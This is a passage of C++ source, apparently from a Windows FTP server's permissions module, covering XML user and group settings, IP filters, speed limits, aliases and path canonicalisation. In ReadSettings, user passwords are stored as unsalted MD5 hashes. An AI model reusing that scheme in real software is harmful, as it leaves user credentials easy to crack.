		SetKey(pUser, _T(&quot;Enabled&quot;), iter-&gt;nEnabled);
		SetKey(pUser, _T(&quot;Comments&quot;), iter-&gt;comment);
		SetKey(pUser, _T(&quot;ForceSsl&quot;), iter-&gt;forceSsl);

		SaveIpFilter(pUser, *iter);
		SavePermissions(pUser, *iter);
		SaveSpeedLimits(pUser, *iter);
	}
	if (!COptions::FreeXML(pXML, true))
		return FALSE;

	return TRUE;
}

bool CPermissions::Init()
{
	EnterCritSection(m_sync);
	m_pPermissionsHelperWindow = new CPermissionsHelperWindow(this);
	if (m_sInstanceList.empty() &amp;&amp; m_sUsersList.empty() &amp;&amp; m_sGroupsList.empty())
	{
		// It's the first time Init gets called after application start, read
		// permissions from xml file.

		ReadSettings();
	}
	else
	{
		m_GroupsList.clear();
		for (t_GroupsList::iterator groupiter = m_sGroupsList.begin(); groupiter != m_sGroupsList.end(); groupiter++)
			m_GroupsList.push_back(*groupiter);

		m_UsersList.clear();
		for (t_UsersList::iterator iter = m_sUsersList.begin(); iter != m_sUsersList.end(); iter++)
		{
			CUser user = *iter;
			user.pOwner = NULL;
			if (user.group != _T(&quot;&quot;))
			{
				for (t_GroupsList::iterator groupiter=m_GroupsList.begin(); groupiter!=m_GroupsList.end(); groupiter++)
					if (groupiter-&gt;group == user.group)
					{
						user.pOwner = &amp;(*groupiter);
						break;
					}
			}
			m_UsersList.push_back(user);
		}
	}

	std::list&lt;CPermissions *&gt;::iterator instanceIter;
	for (instanceIter = m_sInstanceList.begin(); instanceIter != m_sInstanceList.end(); instanceIter++)
		if (*instanceIter == this)
			break;
	if (instanceIter == m_sInstanceList.end())
		m_sInstanceList.push_back(this);
	LeaveCritSection(m_sync);

	return TRUE;
}

void CPermissions::ReadPermissions(TiXmlElement *pXML, t_group &amp;user, BOOL &amp;bGotHome)
{
	bGotHome = FALSE;
	for (TiXmlElement* pPermissions = pXML-&gt;FirstChildElement(&quot;Permissions&quot;); pPermissions; pPermissions = pPermissions-&gt;NextSiblingElement(&quot;Permissions&quot;))
	{
		for (TiXmlElement* pPermission = pPermissions-&gt;FirstChildElement(&quot;Permission&quot;); pPermission; pPermission = pPermission-&gt;NextSiblingElement(&quot;Permission&quot;))
		{
			t_directory dir;
			dir.dir = ConvFromNetwork(pPermission-&gt;Attribute(&quot;Dir&quot;));
			dir.dir.Replace('/', '\\');
			dir.dir.TrimRight('\\');
			if (dir.dir == _T(&quot;&quot;))
				continue;

			for (TiXmlElement* pAliases = pPermission-&gt;FirstChildElement(&quot;Aliases&quot;); pAliases; pAliases = pAliases-&gt;NextSiblingElement(&quot;Aliases&quot;))
			{
				for (TiXmlElement* pAlias = pAliases-&gt;FirstChildElement(&quot;Alias&quot;); pAlias; pAlias = pAlias-&gt;NextSiblingElement(&quot;Alias&quot;))
				{
					CStdString alias = XML::ReadText(pAlias);
					if (alias == _T(&quot;&quot;))
						continue;

					if (alias[0] != '/')
					{
						alias.Replace(_T(&quot;/&quot;), _T(&quot;\\&quot;));
						bool uncPath = false;
						if (alias.Left(2) == _T(&quot;\\\\&quot;))
							uncPath = true;
						while (alias.Replace(_T(&quot;\\\\&quot;), _T(&quot;\\&quot;)));
						if (uncPath)
							alias = _T(&quot;\\&quot;) + alias;

						alias.TrimRight('\\');
						if (alias != _T(&quot;&quot;))
							dir.aliases.push_back(alias);
					}
					else
					{
						alias.Replace(_T(&quot;\\&quot;), _T(&quot;/&quot;));
						while (alias.Replace(_T(&quot;//&quot;), _T(&quot;/&quot;)));
						alias.TrimRight('/');
						if (alias != _T(&quot;&quot;) &amp;&amp; alias != _T(&quot;/&quot;))
							dir.aliases.push_back(alias);
					}
				}
			}
			for (TiXmlElement* pOption = pPermission-&gt;FirstChildElement(&quot;Option&quot;); pOption; pOption = pOption-&gt;NextSiblingElement(&quot;Option&quot;))
			{
				CStdString name = ConvFromNetwork(pOption-&gt;Attribute(&quot;Name&quot;));
				CStdString value = XML::ReadText(pOption);

				if (name == _T(&quot;FileRead&quot;))
					dir.bFileRead = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;FileWrite&quot;))
					dir.bFileWrite = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;FileDelete&quot;))
					dir.bFileDelete = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;FileAppend&quot;))
					dir.bFileAppend = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;DirCreate&quot;))
					dir.bDirCreate = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;DirDelete&quot;))
					dir.bDirDelete = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;DirList&quot;))
					dir.bDirList = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;DirSubdirs&quot;))
					dir.bDirSubdirs = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;IsHome&quot;))
					dir.bIsHome = value == _T(&quot;1&quot;);
				else if (name == _T(&quot;AutoCreate&quot;))
					dir.bAutoCreate = value == _T(&quot;1&quot;);
			}

			//Avoid multiple home dirs
			if (dir.bIsHome)
				if (!bGotHome)
					bGotHome = TRUE;
				else
					dir.bIsHome = FALSE;

			if (user.permissions.size() &lt; 20000)
				user.permissions.push_back(dir);
		}
	}
}

void CPermissions::AutoCreateDirs(LPCTSTR username)
{
	// Create missing directores after a user has logged on
	CUser user;
	if (!GetUser(username, user))
		return;
	for (std::vector&lt;t_directory&gt;::iterator permissioniter = user.permissions.begin(); permissioniter != user.permissions.end(); permissioniter++)
		if (permissioniter-&gt;bAutoCreate)
		{
			CStdString dir = permissioniter-&gt;dir;
			user.DoReplacements(dir);
			
			dir += _T(&quot;\\&quot;);
			CStdString str;
			while (dir != _T(&quot;&quot;))
			{
				int pos = dir.Find(_T(&quot;\\&quot;));
				CStdString piece = dir.Left(pos + 1);
				dir = dir.Mid(pos + 1);
				
				str += piece;
				CreateDirectory(str, 0);
			}
		}
	if (user.pOwner)
		for (std::vector&lt;t_directory&gt;::iterator permissioniter = user.pOwner-&gt;permissions.begin(); permissioniter != user.pOwner-&gt;permissions.end(); permissioniter++)
			if (permissioniter-&gt;bAutoCreate)
			{
				CStdString dir = permissioniter-&gt;dir;
				user.DoReplacements(dir);

				dir += _T(&quot;\\&quot;);
				CStdString str;
				while (dir != _T(&quot;&quot;))
				{
					int pos = dir.Find(_T(&quot;\\&quot;));
					CStdString piece = dir.Left(pos + 1);
					dir = dir.Mid(pos + 1);
				
					str += piece;
					CreateDirectory(str, 0);
				}
			}
}

void CPermissions::ReadSpeedLimits(TiXmlElement *pXML, t_group &amp;group)
{
	const CStdString prefixes[] = { _T(&quot;Dl&quot;), _T(&quot;Ul&quot;) };
	const char* names[] = { &quot;Download&quot;, &quot;Upload&quot; };

	for (TiXmlElement* pSpeedLimits = pXML-&gt;FirstChildElement(&quot;SpeedLimits&quot;); pSpeedLimits; pSpeedLimits = pSpeedLimits-&gt;NextSiblingElement(&quot;SpeedLimits&quot;))
	{
		CStdString str;
		int n;

		for (int i = 0; i &lt; 2; i++)
		{
			str = pSpeedLimits-&gt;Attribute(ConvToNetwork(prefixes[i] + _T(&quot;Type&quot;)));
			n = _ttoi(str);
			if (n &gt;= 0 &amp;&amp; n &lt; 4)
				group.nSpeedLimitType[i] = n;
			str = pSpeedLimits-&gt;Attribute(ConvToNetwork(prefixes[i] + _T(&quot;Limit&quot;)));
			n = _ttoi(str);
			if (n &gt; 0 &amp;&amp; n &lt; 65536)
				group.nSpeedLimit[i] = n;

			str = pSpeedLimits-&gt;Attribute(ConvToNetwork(_T(&quot;Server&quot;) + prefixes[i] + _T(&quot;LimitBypass&quot;)));
			n = _ttoi(str);
			if (n &gt;= 0 &amp;&amp; n &lt; 4)
				group.nBypassServerSpeedLimit[i] = n;

			for (TiXmlElement* pLimit = pSpeedLimits-&gt;FirstChildElement(names[i]); pLimit; pLimit = pLimit-&gt;NextSiblingElement(names[i]))
			{
				for (TiXmlElement* pRule = pLimit-&gt;FirstChildElement(&quot;Rule&quot;); pRule; pRule = pRule-&gt;NextSiblingElement(&quot;Rule&quot;))
				{
					CSpeedLimit limit;
					if (!limit.Load(pRule))
						continue;

					if (group.SpeedLimits[i].size() &lt; 20000)
						group.SpeedLimits[i].push_back(limit);
				}
			}
		}
	}
}

void CPermissions::SaveSpeedLimits(TiXmlElement *pXML, const t_group &amp;group)
{
	TiXmlElement* pSpeedLimits = pXML-&gt;LinkEndChild(new TiXmlElement(&quot;SpeedLimits&quot;))-&gt;ToElement();

	CStdString str;

	const CStdString prefixes[] = { _T(&quot;Dl&quot;), _T(&quot;Ul&quot;) };
	const char* names[] = { &quot;Download&quot;, &quot;Upload&quot; };

	for (int i = 0; i &lt; 2; i++)
	{
		pSpeedLimits-&gt;SetAttribute(ConvToNetwork(prefixes[i] + _T(&quot;Type&quot;)), group.nSpeedLimitType[i]);
		pSpeedLimits-&gt;SetAttribute(ConvToNetwork(prefixes[i] + _T(&quot;Limit&quot;)), group.nSpeedLimit[i]);
		pSpeedLimits-&gt;SetAttribute(ConvToNetwork(_T(&quot;Server&quot;) + prefixes[i] + _T(&quot;LimitBypass&quot;)), group.nBypassServerSpeedLimit[i]);
	
		TiXmlElement* pSpeedLimit = new TiXmlElement(names[i]);
		pSpeedLimits-&gt;LinkEndChild(pSpeedLimit);

		for (unsigned int j = 0; j &lt; group.SpeedLimits[i].size(); j++)
		{
			CSpeedLimit limit = group.SpeedLimits[i][j];

			TiXmlElement* pRule = pSpeedLimit-&gt;LinkEndChild(new TiXmlElement(&quot;Rule&quot;))-&gt;ToElement();

			limit.Save(pRule);
		}
	}
}

void CPermissions::ReloadConfig()
{
	m_UsersList.clear();
	m_GroupsList.clear();

	EnterCritSection(m_sync);

	ReadSettings();

	UpdateInstances();

	LeaveCritSection(m_sync);

	return;
}

void CPermissions::ReadIpFilter(TiXmlElement *pXML, t_group &amp;group)
{
	for (TiXmlElement* pFilter = pXML-&gt;FirstChildElement(&quot;IpFilter&quot;); pFilter; pFilter = pFilter-&gt;NextSiblingElement(&quot;IpFilter&quot;))
	{
		for (TiXmlElement* pDisallowed = pFilter-&gt;FirstChildElement(&quot;Disallowed&quot;); pDisallowed; pDisallowed = pDisallowed-&gt;NextSiblingElement(&quot;Disallowed&quot;))
		{
			for (TiXmlElement* pIP = pDisallowed-&gt;FirstChildElement(&quot;IP&quot;); pIP; pIP = pIP-&gt;NextSiblingElement(&quot;IP&quot;))
			{
				CStdString ip = XML::ReadText(pIP);
				if (ip == _T(&quot;&quot;))
					continue;

				if (group.disallowedIPs.size() &gt;= 30000)
					break;

				if (ip == _T(&quot;*&quot;))
					group.disallowedIPs.push_back(ip);
				else
				{
					if (IsValidAddressFilter(ip))
						group.disallowedIPs.push_back(ip);
				}
			}
		}
		for (TiXmlElement* pAllowed = pFilter-&gt;FirstChildElement(&quot;Allowed&quot;); pAllowed; pAllowed = pAllowed-&gt;NextSiblingElement(&quot;Allowed&quot;))
		{
			for (TiXmlElement* pIP = pAllowed-&gt;FirstChildElement(&quot;IP&quot;); pIP; pIP = pIP-&gt;NextSiblingElement(&quot;IP&quot;))
			{
				CStdString ip = XML::ReadText(pIP);
				if (ip == _T(&quot;&quot;))
					continue;

				if (group.allowedIPs.size() &gt;= 30000)
					break;

				if (ip == _T(&quot;*&quot;))
					group.allowedIPs.push_back(ip);
				else
				{
					if (IsValidAddressFilter(ip))
						group.allowedIPs.push_back(ip);
				}
			}
		}
	}
}

void CPermissions::SaveIpFilter(TiXmlElement *pXML, const t_group &amp;group)
{
	TiXmlElement* pFilter = pXML-&gt;LinkEndChild(new TiXmlElement(&quot;IpFilter&quot;))-&gt;ToElement();
	
	TiXmlElement* pDisallowed = pFilter-&gt;LinkEndChild(new TiXmlElement(&quot;Disallowed&quot;))-&gt;ToElement();
		
	std::list&lt;CStdString&gt;::const_iterator iter;
	for (iter = group.disallowedIPs.begin(); iter != group.disallowedIPs.end(); iter++)
	{
		TiXmlElement* pIP = pDisallowed-&gt;LinkEndChild(new TiXmlElement(&quot;IP&quot;))-&gt;ToElement();
		XML::SetText(pIP, *iter);
	}

	TiXmlElement* pAllowed = pFilter-&gt;LinkEndChild(new TiXmlElement(&quot;Allowed&quot;))-&gt;ToElement();
		
	for (iter = group.allowedIPs.begin(); iter != group.allowedIPs.end(); iter++)
	{
		TiXmlElement* pIP = pAllowed-&gt;LinkEndChild(new TiXmlElement(&quot;IP&quot;))-&gt;ToElement();
		XML::SetText(pIP, *iter);
	}
}

CStdString CPermissions::CanonifyServerDir(CStdString currentDir, CStdString newDir) const
{
	/*
	 * CanonifyPath takes the current and the new server dir as parameter,
	 * concats the paths if neccessary and canonifies the dir:
	 * - remove dot-segments
	 * - convert backslashes into slashes
	 * - remove double slashes
	 */

	if (newDir == _T(&quot;&quot;))
		return currentDir;

	// Make segment separators pretty
	newDir.Replace(_T(&quot;\\&quot;), _T(&quot;/&quot;));
	while (newDir.Replace(_T(&quot;//&quot;), _T(&quot;/&quot;)));
	
	if (newDir == _T(&quot;/&quot;))
		return newDir;
	
	// This list will hold the individual path segments
	std::list&lt;CStdString&gt; piecelist;
	
	/*
	 * Check the type of the path: Absolute or relative?
	 * On relative paths, use currentDir as base, else use
	 * only dir.
	 */
	if (newDir.Left(1) != _T(&quot;/&quot;))
	{
		// New relative path, split currentDir and add it to the piece list.
		currentDir.TrimLeft(_T(&quot;/&quot;));
		int pos;
		while((pos = currentDir.Find(_T(&quot;/&quot;))) != -1)
		{
			piecelist.push_back(currentDir.Left(pos));
			currentDir = currentDir.Mid(pos + 1);
		}
		if (currentDir != _T(&quot;&quot;))
			piecelist.push_back(currentDir);
	}
	
	/*
	 * Now split up the new dir into individual segments. Here we
	 * check for dot segments and remove the proper number of segments
	 * from the piece list on dots.
	 */
	
	int pos;
	newDir.TrimLeft(_T(&quot;/&quot;));
	if (newDir.Right(1) != _T(&quot;/&quot;))
		newDir += _T(&quot;/&quot;);
	while ((pos = newDir.Find(_T(&quot;/&quot;))) != -1)
	{
		CStdString piece = newDir.Left(pos);
		newDir = newDir.Mid(pos + 1);

		if (piece == _T(&quot;&quot;))
			continue;

		bool allDots = true;
		int dotCount = 0;
		for (int i = 0; i &lt; piece.GetLength(); i++)
			if (piece[i] != '.')
			{
				allDots = false;
				break;
			}
			else
				dotCount++;

		if (allDots)
		{
			while (--dotCount)
			{
				if (!piecelist.empty())
					piecelist.pop_back();
			}
		}
		else
			piecelist.push_back(piece);
	}

	// Reassemble the directory
	CStdString result;

	if (piecelist.empty())
		return _T(&quot;/&quot;);

	// List of reserved filenames which may not be used on a Windows system
	static LPCTSTR reservedNames[] = {	_T(&quot;CON&quot;),	_T(&quot;PRN&quot;),	_T(&quot;AUX&quot;),	_T(&quot;CLOCK$&quot;), _T(&quot;NUL&quot;),
										_T(&quot;COM1&quot;), _T(&quot;COM2&quot;), _T(&quot;COM3&quot;), _T(&quot;COM4&quot;), _T(&quot;COM5&quot;),
										_T(&quot;COM6&quot;), _T(&quot;COM7&quot;), _T(&quot;COM8&quot;), _T(&quot;COM9&quot;),
										_T(&quot;LPT1&quot;), _T(&quot;LPT2&quot;), _T(&quot;LPT3&quot;), _T(&quot;LPT4&quot;), _T(&quot;LPT5&quot;),
										_T(&quot;LPT6&quot;), _T(&quot;LPT7&quot;), _T(&quot;LPT8&quot;), _T(&quot;LPT9&quot;),
										_T(&quot;&quot;) };

	for (std::list&lt;CStdString&gt;::iterator iter = piecelist.begin(); iter != piecelist.end(); iter++)
	{
		// Check for reserved filenames
		CStdString piece = *iter;
		piece.MakeUpper();
		for (LPCTSTR *reserved = reservedNames; **reserved; reserved++)
		{
			if (piece == *reserved)
				return _T(&quot;&quot;);
		}
		int pos = piece.Find(_T(&quot;.&quot;));
		if (pos &gt;= 3)
		{
			piece = piece.Left(pos);
			for (LPCTSTR *reserved = reservedNames; **reserved; reserved++)
			{
				if (piece == *reserved)
					return _T(&quot;&quot;);
			}
		}

		result += _T(&quot;/&quot;) + *iter;
	}

	// Now dir is the canonified absolute server path.
	return result;
}

int CPermissions::GetFact(LPCTSTR username, CStdString currentDir, CStdString file, CStdString&amp; fact, CStdString&amp; logicalName, bool enabledFacts[3])
{
	// Get user from username
	CUser user;
	if (!GetUser(username, user))
		return PERMISSION_DENIED; // No user found

	CStdString dir = CanonifyServerDir(currentDir, file);
	if (dir == _T(&quot;&quot;))
		return PERMISSION_INVALIDNAME;
	logicalName = dir;

	t_directory directory;
	BOOL bTruematch;
	int res = GetRealDirectory(dir, user, directory, bTruematch);
	if (res == PERMISSION_FILENOTDIR)
	{
		if (dir == _T(&quot;/&quot;))
			return res;

		int pos = dir.ReverseFind('/');
		if (pos == -1)
			return res;

		CStdString dir2;
		if (pos)
			dir2 = dir.Left(pos);
		else
			dir2 = _T(&quot;/&quot;);

		CStdString fn = dir.Mid(pos + 1);
		int res = GetRealDirectory(dir2, user, directory, bTruematch);
		if (res)
			return res | PERMISSION_FILENOTDIR;

		if (!directory.bFileRead)
			return PERMISSION_DENIED;

		file = directory.dir + _T(&quot;\\&quot;) + fn;
		
		if (enabledFacts[0])
			fact = _T(&quot;type=file;&quot;);
		else
			fact = _T(&quot;&quot;);
	}
	else if (res)
		return res;
	else
	{
		if (!directory.bDirList)
			return PERMISSION_DENIED;

		if (!bTruematch &amp;&amp; !directory.bDirSubdirs)
			return PERMISSION_DENIED;

		file = directory.dir;

		if (enabledFacts[0])
			fact = _T(&quot;type=dir;&quot;);
		else
			fact = _T(&quot;&quot;);
	}

	CFileStatus64 status;
	if (GetStatus64(file, status))
	{
		if (enabledFacts[1] &amp;&amp; !(status.m_attribute &amp; FILE_ATTRIBUTE_DIRECTORY))
		{
			CStdString str;
			str.Format(_T(&quot;size=%I64d;&quot;), status.m_size);
			fact += str;
		}

		if (enabledFacts[2])
		{
			// Get last modification time
			FILETIME ftime = status.m_mtime;
			if (!ftime.dwHighDateTime &amp;&amp; !ftime.dwLowDateTime)
				ftime = status.m_ctime;
			if (ftime.dwHighDateTime || ftime.dwLowDateTime)
			{
				SYSTEMTIME time;
				FileTimeToSystemTime(&amp;ftime, &amp;time);
				CStdString str;
				str.Format(_T(&quot;modify=%04d%02d%02d%02d%02d%02d;&quot;),
					time.wYear,
					time.wMonth,
					time.wDay,
					time.wHour,
					time.wMinute,
					time.wSecond);

				fact += str;
			}
		}
	}

	fact += _T(&quot; &quot;) + logicalName;

	return 0;
}

void CUser::PrepareAliasMap()
{
	/*
	 * Prepare the alias map.
	 * For fast access, aliases are stored as key/value pairs.
	 * The key is the folder part of the alias.
	 * The value is a structure containing the name of the alias
	 * and the target folder.
	 * Example:
	 * Shared folder c:\myfolder, alias d:\myotherfolder\myalias
	 * Key: d:\myotherfolder, Value = myalias, c:\myfolder
	 */

	aliasMap.clear();
	virtualAliases.clear();
	std::vector&lt;t_directory&gt;::const_iterator permIter;
	std::list&lt;CStdString&gt;::const_iterator aliasIter;
	for (permIter = permissions.begin(); permIter != permissions.end(); permIter++)
	{
		for (aliasIter = permIter-&gt;aliases.begin(); aliasIter != permIter-&gt;aliases.end(); aliasIter++)
		{
			CStdString alias = *aliasIter;
			DoReplacements(alias);

			if (alias[0] == '/')
			{
				int pos = alias.ReverseFind('/');
				CStdString dir = alias.Left(pos);
				if (dir == _T(&quot;&quot;))
					dir = _T(&quot;/&quot;);
				virtualAliasNames.insert(std::pair&lt;CStdString, CStdString&gt;(dir, alias.Mid(pos + 1)));
				virtualAliases[alias + _T(&quot;/&quot;)] = permIter-&gt;dir;
				DoReplacements(virtualAliases[alias + _T(&quot;/&quot;)]);
				continue;
			}

			int pos = alias.ReverseFind('\\');
			if (pos == -1)
				continue;
			t_alias aliasStruct;
			aliasStruct.name = alias.Mid(pos + 1);
			if (aliasStruct.name == _T(&quot;&quot;))
				continue;
			alias = alias.Left(pos);

			aliasStruct.targetFolder = permIter-&gt;dir;
			DoReplacements(aliasStruct.targetFolder);

			aliasMap.insert(std::pair&lt;CStdString, t_alias&gt;(alias, aliasStruct));
		}
	}

	if (!pOwner)
		return;

	for (permIter = pOwner-&gt;permissions.begin(); permIter != pOwner-&gt;permissions.end(); permIter++)
	{
		for (aliasIter = permIter-&gt;aliases.begin(); aliasIter != permIter-&gt;aliases.end(); aliasIter++)
		{
			CStdString alias = *aliasIter;
			DoReplacements(alias);

			if (alias[0] == '/')
			{
				int pos = alias.ReverseFind('/');
				CStdString dir = alias.Left(pos);
				if (dir == _T(&quot;&quot;))
					dir = _T(&quot;/&quot;);
				virtualAliasNames.insert(std::pair&lt;CStdString, CStdString&gt;(dir, alias.Mid(pos + 1)));
				virtualAliases[alias + _T(&quot;/&quot;)] = permIter-&gt;dir;
				DoReplacements(virtualAliases[alias + _T(&quot;/&quot;)]);
				continue;
			}

			int pos = alias.ReverseFind('\\');
			if (pos == -1)
				continue;
			t_alias aliasStruct;
			aliasStruct.name = alias.Mid(pos + 1);
			if (aliasStruct.name == _T(&quot;&quot;))
				continue;
			alias = alias.Left(pos);
			
			aliasStruct.targetFolder = permIter-&gt;dir;
			DoReplacements(aliasStruct.targetFolder);
		
			aliasMap.insert(std::pair&lt;CStdString, t_alias&gt;(alias, aliasStruct));
		}
	}
}

CStdString CUser::GetAliasTarget(const CStdString&amp; path, const CStdString&amp; virtualPath, const CStdString&amp; name) const
{
	// Find the target for the alias with the specified path and name

	for (std::multimap&lt;CStdString, CUser::t_alias&gt;::const_iterator iter = aliasMap.begin(); iter != aliasMap.end(); iter++)
	{
		if (iter-&gt;first.CompareNoCase(path))
			continue;

		if (!iter-&gt;second.name.CompareNoCase(name))
			return iter-&gt;second.targetFolder;
	}

	for (std::map&lt;CStdString, CStdString&gt;::const_iterator iter2 = virtualAliases.begin(); iter2 != virtualAliases.end(); iter2++)
	{
		if (!iter2-&gt;first.CompareNoCase(virtualPath))
			return iter2-&gt;second;
	}

	return _T(&quot;&quot;);
}

void CPermissions::ReadSettings()
{
	TiXmlElement *pXML = COptions::GetXML();
	if (!pXML)
		return;
    
	TiXmlElement* pGroups = pXML-&gt;FirstChildElement(&quot;Groups&quot;);
	if (!pGroups)
		pGroups = pXML-&gt;LinkEndChild(new TiXmlElement(&quot;Groups&quot;))-&gt;ToElement();

	for (TiXmlElement* pGroup = pGroups-&gt;FirstChildElement(&quot;Group&quot;); pGroup; pGroup = pGroup-&gt;NextSiblingElement(&quot;Group&quot;))
	{
		t_group group;
		group.nIpLimit = group.nIpLimit = group.nUserLimit = 0;
		group.nBypassUserLimit = 2;
		group.group = ConvFromNetwork(pGroup-&gt;Attribute(&quot;Name&quot;));
		if (group.group == _T(&quot;&quot;))
			continue;

		for (TiXmlElement* pOption = pGroup-&gt;FirstChildElement(&quot;Option&quot;); pOption; pOption = pOption-&gt;NextSiblingElement(&quot;Option&quot;))
		{
			CStdString name = ConvFromNetwork(pOption-&gt;Attribute(&quot;Name&quot;));
			CStdString value = XML::ReadText(pOption);

			if (name == _T(&quot;Bypass server userlimit&quot;))
				group.nBypassUserLimit = _ttoi(value);
			else if (name == _T(&quot;User Limit&quot;))
				group.nUserLimit = _ttoi(value);
			else if (name == _T(&quot;IP Limit&quot;))
				group.nIpLimit = _ttoi(value);
			else if (name == _T(&quot;Enabled&quot;))
				group.nEnabled = _ttoi(value);
			else if (name == _T(&quot;Comments&quot;))
				group.comment = value;
			else if (name == _T(&quot;ForceSsl&quot;))
				group.forceSsl = _ttoi(value);
		}
		if (group.nUserLimit &lt; 0 || group.nUserLimit &gt; 999999999)
			group.nUserLimit = 0;
		if (group.nIpLimit &lt; 0 || group.nIpLimit &gt; 999999999)
			group.nIpLimit = 0;

		ReadIpFilter(pGroup, group);

		BOOL bGotHome = FALSE;
		ReadPermissions(pGroup, group, bGotHome);
		//Set a home dir if no home dir could be read
		if (!bGotHome &amp;&amp; !group.permissions.empty())
			group.permissions.begin()-&gt;bIsHome = TRUE;

		ReadSpeedLimits(pGroup, group);

		if (m_GroupsList.size() &lt; 200000)
			m_GroupsList.push_back(group);
	}
		
	TiXmlElement* pUsers = pXML-&gt;FirstChildElement(&quot;Users&quot;);
	if (!pUsers)
		pUsers = pXML-&gt;LinkEndChild(new TiXmlElement(&quot;Users&quot;))-&gt;ToElement();

	for (TiXmlElement* pUser = pUsers-&gt;FirstChildElement(&quot;User&quot;); pUser; pUser = pUser-&gt;NextSiblingElement(&quot;User&quot;))
	{
		CUser user;
		user.nIpLimit = user.nIpLimit = user.nUserLimit = 0;
		user.nBypassUserLimit = 2;
		user.user = ConvFromNetwork(pUser-&gt;Attribute(&quot;Name&quot;));
		if (user.user == _T(&quot;&quot;))
			continue;

		for (TiXmlElement* pOption = pUser-&gt;FirstChildElement(&quot;Option&quot;); pOption; pOption = pOption-&gt;NextSiblingElement(&quot;Option&quot;))
		{
			CStdString name = ConvFromNetwork(pOption-&gt;Attribute(&quot;Name&quot;));
			CStdString value = XML::ReadText(pOption);

			if (name == _T(&quot;Pass&quot;))
			{
				// If provided password is not a MD5 has, convert it into a MD5 hash
				if (value != _T(&quot;&quot;) &amp;&amp; value.GetLength() != 32)
				{
					char *tmp = ConvToNetwork(value);
					if (!tmp)
					{
						tmp = new char[1];
						tmp[0] = 0;
					}
					MD5 md5;
					md5.update((unsigned char *)tmp, strlen(tmp));
					md5.finalize();
					char *res = md5.hex_digest();

					pOption-&gt;Clear();
					XML::SetText(pOption, res);
					user.password = res;
					delete [] tmp;
					delete [] res;
				}
				else
					user.password = value;
			}
			else if (name == _T(&quot;Bypass server userlimit&quot;))
				user.nBypassUserLimit = _ttoi(value);
			else if (name == _T(&quot;User Limit&quot;))
				user.nUserLimit = _ttoi(value);
			else if (name == _T(&quot;IP Limit&quot;))
				user.nIpLimit = _ttoi(value);
			else if (name == _T(&quot;Group&quot;))
				user.group = value;
			else if (name == _T(&quot;Enabled&quot;))
				user.nEnabled = _ttoi(value);
			else if (name == _T(&quot;Comments&quot;))
				user.comment = value;
			else if (name == _T(&quot;ForceSsl&quot;))
				user.forceSsl = _ttoi(value);
		}
		if (user.nUserLimit &lt; 0 || user.nUserLimit &gt; 999999999)
			user.nUserLimit = 0;
		if (user.nIpLimit &lt; 0 || user.nIpLimit &gt; 999999999)
			user.nIpLimit = 0;

		if (user.group != _T(&quot;&quot;))
		{
			for (t_GroupsList::iterator groupiter = m_GroupsList.begin(); groupiter != m_GroupsList.end(); groupiter++)
				if (groupiter-&gt;group == user.group)
				{
					user.pOwner = &amp;(*groupiter);
					break;
				}
		
			if (!user.pOwner)
				user.group = _T(&quot;&quot;);
		}
			
		ReadIpFilter(pUser, user);

		BOOL bGotHome = FALSE;
		ReadPermissions(pUser, user, bGotHome);
		user.PrepareAliasMap();
				
		//Set a home dir if no home dir could be read
		if (!bGotHome &amp;&amp; !user.pOwner)
		{
			if (!user.permissions.empty())
				user.permissions.begin()-&gt;bIsHome = TRUE;
		}
			
		std::vector&lt;t_directory&gt;::iterator iter;
		for (iter = user.permissions.begin(); iter != user.permissions.end(); iter++)
		{
			if (iter-&gt;bIsHome)
			{
				user.homedir = iter-&gt;dir;
				break;
			}
		}
		if (user.homedir == _T(&quot;&quot;) &amp;&amp; user.pOwner)
		{
			for (iter = user.pOwner-&gt;permissions.begin(); iter != user.pOwner-&gt;permissions.end(); iter++)
			{
				if (iter-&gt;bIsHome)
				{
					user.homedir = iter-&gt;dir;
					break;
				}
			}
		}
			
		ReadSpeedLimits(pUser, user);

		if (m_UsersList.size() &lt; 200000)
			m_UsersList.push_back(user);
	}
	COptions::FreeXML(pXML, false);

	EnterCritSection(m_sync);

	m_sGroupsList.clear();
	for (t_GroupsList::iterator groupiter = m_GroupsList.begin(); groupiter != m_GroupsList.end(); groupiter++)
		m_sGroupsList.push_back(*groupiter);

	m_sUsersList.clear();
	for (t_UsersList::iterator iter = m_UsersList.begin(); iter != m_UsersList.end(); iter++)
	{
		CUser user = *iter;
		user.pOwner = NULL;
		if (user.group != _T(&quot;&quot;))
		{
			for (t_GroupsList::iterator groupiter = m_GroupsList.begin(); groupiter != m_GroupsList.end(); groupiter++)
				if (groupiter-&gt;group == user.group)
				{
					user.pOwner = &amp;(*groupiter);
					break;
				}
		}
		m_sUsersList.push_back(user);
	}

	LeaveCritSection(m_sync);
}

// Replace :u and :g (if a group it exists)
void CUser::DoReplacements(CStdString&amp; path) const
{
	path.Replace(_T(&quot;:u&quot;), user);
	path.Replace(_T(&quot;:U&quot;), user);
	if (group != _T(&quot;&quot;))
	{
		path.Replace(_T(&quot;:g&quot;), group);
		path.Replace(_T(&quot;:G&quot;), group);
	}
}

bool CPermissions::WildcardMatch(CStdString string, CStdString pattern) const
{
	if (pattern == _T(&quot;*&quot;) || pattern == _T(&quot;*.*&quot;))
		return true;

	// Do a really primitive wildcard check, does even ignore ?
	string.MakeLower();
	pattern.MakeLower();

	bool starFirst = false;
	while (pattern != _T(&quot;&quot;))
	{
		int pos = pattern.Find('*');
		if (pos == -1)
		{
			if (starFirst)
			{
				if (string.GetLength() &gt; pattern.GetLength())
					string = string.Right(pattern.GetLength());
			}
			if (pattern != string)
				return false;
			else
				return true;
		}
		else if (!pos)
		{
			starFirst = true;
			pattern = pattern.Mid(1);
		}
		else
		{
			int npos = string.Find(pattern.Left(pos));
			if (npos == -1)
				return false;
			if (npos &amp;&amp; !starFirst)
				return false;
			pattern = pattern.Mid(pos + 1);
			string = string.Mid(npos + pos);

			starFirst = true;
		}
	}
	return true;
}

char* CPermissions::ConvertFilename(const CStdString&amp; filename, bool useUTF8)
{
	if (useUTF8)
		return ConvToNetwork(filename);
	
	const CStdStringA&amp; tmp = ConvToLocal(filename);
    
	char* str = new char[strlen(tmp) + 1];
	strcpy(str, tmp);
	return str;
}

void CPermissions::DestroyDirlisting(struct t_dirlisting* pListing)
{
	while (pListing)
	{
